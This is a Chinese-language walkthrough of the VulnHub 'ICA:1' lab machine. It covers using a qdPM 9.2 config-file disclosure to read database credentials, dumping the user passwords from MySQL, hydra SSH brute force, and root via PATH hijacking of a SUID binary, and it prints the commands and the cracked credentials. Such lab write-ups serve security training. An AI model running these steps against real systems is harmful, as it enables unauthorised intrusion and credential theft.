ICA：1~vulnhub

靶场环境：

kali攻击机：10.21.29.198
靶机：10.21.29.227

信息收集

首先进行端口扫描：

发现22 80 3306端口
登录80端口发现是一登录页面

首先可以看到CMS：qdPM9.2

攻击过程

kali进行漏洞库搜索：

searchsploit qdPM 9.2

查看漏洞详情：

cat /usr/share/exploitdb/exploits/php/webapps/50176.txt

意思是：数据库的密码和连接字符串存储在yml文件中。要访问yml文件，你可以进入http://IP/core/config/databases.yml文件并下载

得到数据库用户名和密码：
username：qdpmadmin
password：UcVQCMQk2STVeS6J

直接远程连接Mysql 并发现staff数据库中有密码和用户名 猜想可进行SSH登录

mysql -u qdpmadmin -h 10.21.29.227 -p

然后将用户名和文件保存到文件里进行SSH爆破(用户名更改为小写)

hydra -L users.txt -P passwd.txt ssh://10.21.29.227

login: dexter password: 7ZwV4qtg42cmUXGX
login: travis password: DJceVy98W28Y7wLg
尝试远程SSH登录

成功发现CIA项目，不过还有一个用户，继续登录

提示说有可执行文件，并且它有一部分是可见的，我们查找一下具有root权限的可执行的文件

find / -perm -u=s 2>/dev/null

用Strings 进行查看

strings /opt/get_access

这个cat命令它并没有指定是哪个文件夹下的cat命令所以我们可以创建一个名为cat的文件，内容写上"/bin/bash"，然后把它添加到环境变量，就可以提权

然后我们直接运行get_access就可以了

成功获取最终flag：特工任务完成